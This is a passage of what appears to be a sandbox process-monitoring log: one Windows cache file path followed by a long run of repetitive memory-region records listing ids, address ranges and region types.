"\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 3338 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3339 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3340 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3341 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3342 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3343 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3344 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3345 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3346 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3347 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3348 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3349 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3350 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3351 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3352 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3353 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3354 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3355 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3356 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3357 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3358 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3359 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3360 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3361 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3362 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3363 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3364 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3365 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3366 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3367 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3368 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3369 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3370 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3371 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3372 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3373 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3374 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3375 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3376 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3377 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3378 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3379 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3380 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3381 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3382 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3383 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3384 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3385 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3386 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3387 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3388 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3389 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3390 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3391 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3392 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3393 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3394 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3395 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3396 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3397 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3398 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3399 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3400 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3401 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3402 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3403 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3404 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3405 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3406 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3407 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3408 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3409 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3410 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3411 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3412 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3413 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3414 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3415 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3416 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3417 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3418 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3419 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3420 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3421 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3422 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3423 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3424 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3425 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3426 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3427 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3428 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3429 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3430 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3431 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3432 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3433 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3434 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3435 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3436 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3437 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3438 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3439 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3440 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3441 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3442 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3443 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3444 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3445 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3446 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3447 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3448 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3449 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3450 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3451 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3452 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3453 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3454 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3455 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3456 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3457 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3458 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3459 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3460 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3461 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3462 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3463 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3464 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3465 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3466 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3467 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3468 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3469 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3470 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3471 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3472 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3473 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3474 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3475 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3476 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3477 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3478 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3479 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3480 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3481 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3482 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3483 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3484 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3485 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3486 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3487 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3488 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3489 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3490 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3491 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3492 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3493 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3494 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3495 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3496 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3497 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3498 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3499 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3500 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3501 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3502 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3503 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3504 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3505 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3506 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3507 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3508 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3509 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3510 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3511 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3512 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3513 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3514 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3515 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3516 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3517 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3518 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3519 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3520 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3521 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3522 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3523 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3524 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3525 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3526 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3527 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3528 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3529 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3530 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3531 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = 